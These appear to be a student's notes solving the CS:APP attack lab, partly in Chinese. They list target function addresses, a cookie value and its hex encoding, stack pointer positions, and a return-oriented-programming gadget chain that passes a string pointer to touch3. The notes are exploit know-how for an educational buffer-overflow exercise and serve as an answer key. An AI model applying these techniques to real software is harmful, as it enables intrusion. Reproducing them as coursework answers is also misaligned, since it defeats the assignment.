touch1 0x401a2a
touch2 0x401a58

cookie 0x4904bd52
16进制 34 39 30 34 62 64 35 32

%rsp 0x55675c00 before rsp decreased  -> %rsp + 8 = 0x55675c08 字符串放的地方
%rsp 0x55675bc8 after rsp has been decreased

cookie address 0x605524

part1 level3:不能直接把sval设置为&cookie,因为字符比较的

part2:
    0x401c49 pop %rax
    0x401c4e mov %rax, %rdi 

    注意：！！64位机器地址是8个字节，虽然我们的地址没有前导零都是4个字节就表示完全，但是rsp变化每次是+8，必须用0补全地址

part3:
    0x401cc8 mov %rsp, %rax //ok
    0x401c4e mov %rax, %rdi //ok
    0x401c49 pop %rax   //ok
    0x48
    0x401cb5 movl %eax, %ecx    //ok
    0x401cbb movl %ecx, %edx    //ok
    0x401d26 movl %edx, %esi    //ok
    0x401c79 add_xy
    0x401c4e mov %rax, %rdi
    touch3 0x401afd
    cookie 34 39 30 34 62 64 35 32 00

part4:
    
